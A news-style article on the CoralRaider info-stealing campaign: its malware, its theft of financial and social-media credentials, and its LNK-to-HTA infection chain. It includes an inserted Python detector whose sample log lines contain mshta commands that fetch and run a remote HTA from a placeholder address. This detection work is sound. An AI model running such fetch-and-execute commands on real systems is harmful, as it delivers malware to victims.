CoralRaider Strikes: A New Threat to Bangladesh Financial Data Security

In a digital landscape fraught with cyber threats, a recent revelation by Cisco Talos has sounded the alarm on a formidable new adversary: CoralRaider. Since its emergence in May 2023, this insidious campaign orchestrated by Vietnamese hackers has been on a mission to plunder financial data, leaving a trail of victims across Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

CoralRaider operates with surgical precision, targeting users’ credentials, financial information, and social media accounts, particularly those used for business and advertising. To execute its objectives, the hackers have assembled a sophisticated arsenal of malware, including RotBot (a modified variant of the Quasar RAT trojan) and the notorious info-stealer XClient. Supplementing these tools are AsyncRAT, NetSupport RAT, and Rhadamanthys, forming a formidable array of cyber weaponry.

The crux of CoralRaider’s strategy lies in its exploitation of business and advertising accounts. Through mechanisms such as Ducktail and NodeStealer, the cybercriminals seize control of these valuable assets and then profit from them. Data harvested from victims’ systems is funneled through Telegram channels and swiftly sold on the black market, fueling a lucrative underground economy.

The campaign’s modus operandi begins with the distribution of innocuous-looking LNK shortcuts; the precise delivery mechanism for these shortcuts remains unknown. When a victim opens the LNK file, it sets off a cascade of malicious activity: an HTML application (HTA) is fetched from the attackers’ server and executes scripts designed to disable security controls on the host and to download RotBot.
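As an added defender-side illustration (not code from Cisco Talos or from this article), the following Python flags the LNK-to-HTA launch pattern described above in process-creation telemetry: mshta.exe pulling an HTA from a remote URL beneath explorer.exe (the typical footprint of a clicked shortcut), and a script host spawned underneath mshta.exe. The log line format, process IDs, file names and the 203.0.113.10 address are constructed assumptions, not indicators from the report.

```python
import re
from typing import Dict, List, NamedTuple

class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str

# Assumed telemetry format: pid=<n> ppid=<n> image=<name> cmd="<command line>"
LINE_RE = re.compile(r'pid=(\d+)\s+ppid=(\d+)\s+image=(\S+)\s+cmd="(.*)"')
REMOTE_URL_RE = re.compile(r'https?://\S+', re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events: one malicious chain plus two benign look-alikes.
SAMPLE_LINES = [
    r'pid=1000 ppid=800 image=explorer.exe cmd="C:\Windows\explorer.exe"',
    r'pid=1200 ppid=1000 image=cmd.exe cmd="cmd.exe /c mshta http://203.0.113.10/stage.hta"',
    r'pid=1300 ppid=1200 image=mshta.exe cmd="mshta.exe http://203.0.113.10/stage.hta"',
    r'pid=1400 ppid=1300 image=powershell.exe cmd="powershell.exe -File C:\Users\Public\stage.ps1"',
    r'pid=1500 ppid=1000 image=mshta.exe cmd="mshta.exe C:\Program Files\Vendor\help.hta"',
    r'pid=1600 ppid=1000 image=powershell.exe cmd="powershell.exe Get-Date"',
]

def parse_events(lines: List[str]) -> List[ProcEvent]:
    events = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:  # skip lines that do not match the assumed format
            events.append(ProcEvent(int(m.group(1)), int(m.group(2)), m.group(3).lower(), m.group(4)))
    return events

def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent], depth: int = 8) -> List[str]:
    """Walk up the parent chain (bounded, so a malformed cycle cannot loop forever)."""
    chain, cur = [], ev
    while cur.ppid in by_pid and depth > 0:
        cur = by_pid[cur.ppid]
        chain.append(cur.image)
        depth -= 1
    return chain

def detect_lnk_hta_chain(events: List[ProcEvent]) -> List[str]:
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        parents = ancestors(ev, by_pid)
        if ev.image == "mshta.exe" and REMOTE_URL_RE.search(ev.cmdline):
            origin = "explorer.exe" if "explorer.exe" in parents else "unknown parent"
            alerts.append(f"pid {ev.pid}: mshta.exe fetched a remote HTA (launched via {origin})")
        elif ev.image in SCRIPT_HOSTS and "mshta.exe" in parents:
            alerts.append(f"pid {ev.pid}: {ev.image} spawned under mshta.exe")
    return alerts

if __name__ == "__main__":
    for alert in detect_lnk_hta_chain(parse_events(SAMPLE_LINES)):
        print(alert)
```

A locally stored HTA (pid 1500) and a PowerShell process with no mshta.exe ancestor (pid 1600) are left alone, which keeps the rule focused on the remote-HTA chain rather than on mshta.exe as such.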

RotBot, acting as the vanguard of the assault, establishes communication with a Telegram bot, paving the way for the deployment of XClient. Operating stealthily in memory, XClient embarks on a systematic plundering of sensitive data. Screenshots are captured, cookie files are pilfered, and credentials are siphoned from various browsers, as well as from applications such as Discord and Telegram.

Not content with mere browser-based spoils, XClient extends its reach to social media behemoths such as Facebook, Instagram, TikTok, and YouTube. Here, it meticulously extracts payment methods and permissions linked to business accounts on Facebook, further enhancing the cybercriminals’ illicit gains.

Attribution of the CoralRaider campaign to operators based in Vietnam is supported by compelling evidence, including linguistic cues within the malicious software code and communications within Telegram channels. Such indications underscore the global nature of cyber threats and the imperative of international cooperation in combating them.

As CoralRaider continues its relentless onslaught, organizations and individuals must fortify their defenses against this pernicious threat. Vigilance, robust cybersecurity measures, and proactive collaboration are essential in safeguarding financial data and preserving the integrity of digital ecosystems.
